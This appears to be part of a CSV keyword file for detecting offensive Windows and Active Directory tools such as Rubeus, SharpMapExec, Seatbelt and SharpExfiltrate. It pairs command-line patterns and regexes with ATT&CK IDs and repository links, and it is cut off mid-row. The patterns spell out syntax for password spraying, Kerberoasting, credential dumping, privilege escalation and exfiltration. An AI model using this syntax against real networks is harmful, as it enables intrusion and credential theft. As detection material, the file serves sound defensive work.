*",".{0,1000}\.exe\sGet\-UserPrivs\s\-Instance\s.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4455" "*.exe --get-users-list > *",".{0,1000}\.exe\s\-\-get\-users\-list\s\>\s.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","4456" "*.exe gmsainfo --sid *",".{0,1000}\.exe\sgmsainfo\s\-\-sid\s.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","N/A","7","2","144","22","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z","4457" "*.exe GoogleDrive --appname * --accesstoken * --filepath * --extensions * --memoryonly*",".{0,1000}\.exe\sGoogleDrive\s\-\-appname\s.{0,1000}\s\-\-accesstoken\s.{0,1000}\s\-\-filepath\s.{0,1000}\s\-\-extensions\s.{0,1000}\s\-\-memoryonly.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","4458" "*.exe --gpo --filter admin 
--domain*",".{0,1000}\.exe\s\-\-gpo\s\-\-filter\sadmin\s\-\-domain.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","4459" "*.exe -group=all *",".{0,1000}\.exe\s\-group\=all\s.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","fp risks","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4460" "*.exe -group=all -AuditPolicies*",".{0,1000}\.exe\s\-group\=all\s\-AuditPolicies.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4461" "*.exe -group=all -full*",".{0,1000}\.exe\s\-group\=all\s\-full.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. 
including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","fp risks","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4462" "*.exe -group=remote *",".{0,1000}\.exe\s\-group\=remote\s.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","fp risks","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4463" "*.exe -group=system *",".{0,1000}\.exe\s\-group\=system\s.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","fp risks","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4464" "*.exe -group=user *",".{0,1000}\.exe\s\-group\=user\s.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","fp risks","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4465" "*.exe hash /password:*",".{0,1000}\.exe\shash\s\/password\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","4466" "*.exe HijackablePaths*",".{0,1000}\.exe\sHijackablePaths.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. 
only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4467" "*.exe -i -c powershell -e netlogon*",".{0,1000}\.exe\s\-i\s\-c\spowershell\s\-e\snetlogon.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","4469" "*.exe -i -c powershell.exe*",".{0,1000}\.exe\s\-i\s\-c\spowershell\.exe.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","4470" "*.exe --impersonate --pid *",".{0,1000}\.exe\s\-\-impersonate\s\-\-pid\s.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","4476" "*.exe Invoke-CLRAsm -Instance * -Command *",".{0,1000}\.exe\sInvoke\-CLRAsm\s\-Instance\s.{0,1000}\s\-Command\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - 
TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4477" "*.exe Invoke-CLRAsm -Instance * -Command *",".{0,1000}\.exe\sInvoke\-CLRAsm\s\-Instance\s.{0,1000}\s\-Command\s.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4478" "*.exe Invoke-LinkedOSCmd -Instance *",".{0,1000}\.exe\sInvoke\-LinkedOSCmd\s\-Instance\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4479" "*.exe Invoke-LinkedOSCmd -Instance *",".{0,1000}\.exe\sInvoke\-LinkedOSCmd\s\-Instance\s.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - 
TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4480" "*.exe Invoke-OLEObject *",".{0,1000}\.exe\sInvoke\-OLEObject\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4481" "*.exe Invoke-OLEObject *",".{0,1000}\.exe\sInvoke\-OLEObject\s.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4482" "*.exe Invoke-OSCmd -Instance * -Command *",".{0,1000}\.exe\sInvoke\-OSCmd\s\-Instance\s.{0,1000}\s\-Command\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4483" "*.exe Invoke-OSCmd -Instance * -Command *",".{0,1000}\.exe\sInvoke\-OSCmd\s\-Instance\s.{0,1000}\s\-Command\s.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4484" "*.exe Invoke-UserImpersonation *",".{0,1000}\.exe\sInvoke\-UserImpersonation\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4485" "*.exe Invoke-UserImpersonation *",".{0,1000}\.exe\sInvoke\-UserImpersonation\s.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4486" "*.exe kdsinfo --guid *",".{0,1000}\.exe\skdsinfo\s\-\-guid\s.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","N/A","7","2","144","22","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z","4488" "*.exe kerberoast /domain*",".{0,1000}\.exe\skerberoast\s\/domain.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","4489" "*.exe kerberos ldap * /m:spraydata*",".{0,1000}\.exe\skerberos\sldap\s.{0,1000}\s\/m\:spraydata.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4490" "*.exe kerberos ldap * /password:* /dc:*",".{0,1000}\.exe\skerberos\sldap\s.{0,1000}\s\/password\:.{0,1000}\s\/dc\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4491" "*.exe kerberos ldap * /ticket:* /m:*",".{0,1000}\.exe\skerberos\sldap\s.{0,1000}\s\/ticket\:.{0,1000}\s\/m\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4492" "*.exe kerberos reg32 * /m:check_pslockdown*",".{0,1000}\.exe\skerberos\sreg32\s.{0,1000}\s\/m\:check_pslockdown.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4493" "*.exe kerberos reg32 * /m:check_pslogging*",".{0,1000}\.exe\skerberos\sreg32\s.{0,1000}\s\/m\:check_pslogging.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4494" "*.exe kerberos reg32 * /m:disable_pslockdown*",".{0,1000}\.exe\skerberos\sreg32\s.{0,1000}\s\/m\:disable_pslockdown.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4495" "*.exe kerberos 
reg32 * /password:* /dc:*",".{0,1000}\.exe\skerberos\sreg32\s.{0,1000}\s\/password\:.{0,1000}\s\/dc\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4496" "*.exe kerberos reg32 * /ticket:*",".{0,1000}\.exe\skerberos\sreg32\s.{0,1000}\s\/ticket\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4497" "*.exe kerberos smb * /computername:* /ticket:*",".{0,1000}\.exe\skerberos\ssmb\s.{0,1000}\s\/computername\:.{0,1000}\s\/ticket\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4498" "*.exe kerberos smb * /m:shares*",".{0,1000}\.exe\skerberos\ssmb\s.{0,1000}\s\/m\:shares.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4499" "*.exe kerberos smb * /password:* /dc:*",".{0,1000}\.exe\skerberos\ssmb\s.{0,1000}\s\/password\:.{0,1000}\s\/dc\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of 
CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4500" "*.exe kerberos smb * /ticket:* /computername:*",".{0,1000}\.exe\skerberos\ssmb\s.{0,1000}\s\/ticket\:.{0,1000}\s\/computername\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4501" "*.exe kerberos winrm * /computername:*",".{0,1000}\.exe\skerberos\swinrm\s.{0,1000}\s\/computername\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4502" "*.exe kerberos winrm * /m:assembly /p:*",".{0,1000}\.exe\skerberos\swinrm\s.{0,1000}\s\/m\:assembly\s\/p\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4503" "*.exe kerberos winrm * /m:comsvcs*",".{0,1000}\.exe\skerberos\swinrm\s.{0,1000}\s\/m\:comsvcs.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4504" "*.exe kerberos winrm * /m:download *",".{0,1000}\.exe\skerberos\swinrm\s.{0,1000}\s\/m\:download\s.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4505" "*.exe kerberos winrm * /m:exec /a:*",".{0,1000}\.exe\skerberos\swinrm\s.{0,1000}\s\/m\:exec\s\/a\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4506" "*.exe kerberos winrm * /m:secrets*",".{0,1000}\.exe\skerberos\swinrm\s.{0,1000}\s\/m\:secrets.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4507" "*.exe kerberos winrm * /m:upload*",".{0,1000}\.exe\skerberos\swinrm\s.{0,1000}\s\/m\:upload.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4508" "*.exe kerberos winrm * 
/rc4:*",".{0,1000}\.exe\skerberos\swinrm\s.{0,1000}\s\/rc4\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4509" "*.exe kerbspray *",".{0,1000}\.exe\skerbspray\s.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4510" "*.exe krbscm -c *cmd.exe*",".{0,1000}\.exe\skrbscm\s\-c\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","4511" "*.exe krbscm*",".{0,1000}\.exe\skrbscm.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","4512" "*.exe -l * -c {B91D5831-B1BD-4608-8198-D72E155020F7}*",".{0,1000}\.exe\s\-l\s.{0,1000}\s\-c\s\{B91D5831\-B1BD\-4608\-8198\-D72E155020F7\}.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege 
